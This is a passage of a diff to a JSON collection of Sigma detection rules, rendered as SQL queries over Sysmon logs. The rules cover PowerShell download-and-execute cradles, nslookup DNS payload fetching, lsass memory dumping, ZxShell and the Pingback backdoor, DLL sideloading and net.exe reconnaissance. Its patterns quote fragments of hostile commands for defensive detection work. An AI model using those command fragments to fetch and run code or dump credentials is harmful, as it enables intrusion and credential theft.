This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX 
((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine 
LIKE '%ncacn\\_np%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" - }, - { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - 
"attack.t1036", + "attack.t1218.011", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ 
@@ -26290,4889 +26367,4783 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + 
"attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "Potential DLL Sideloading Using Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" - ], - "falsepositives": [ - "Inventory tool runs", - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image 
LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" - }, - { - "title": "Imports Registry Key From a File", - "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "status": "test", - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "falsepositives": [ - "Legitimate import of keys", - "Evernote" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" - 
], - "filename": "proc_creation_win_regedit_import_keys.yml" - }, - { - "title": "File or Folder Permissions Modifications", - "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "status": "test", - "description": "Detects a file or folder's permissions being modified or tampered with.", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_permission_modifications.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": 
"image_load_malware_pingback_backdoor.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "status": "experimental", - "description": "Performs execution of specified file, can be used for defensive evasion.", - "author": "frack113", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "status": "test", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T 
(Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. 
This is could be used as a way to launch a reverse shell or execute live python code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "False positives are expected if VLC is installed in non-default locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. 
This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND 
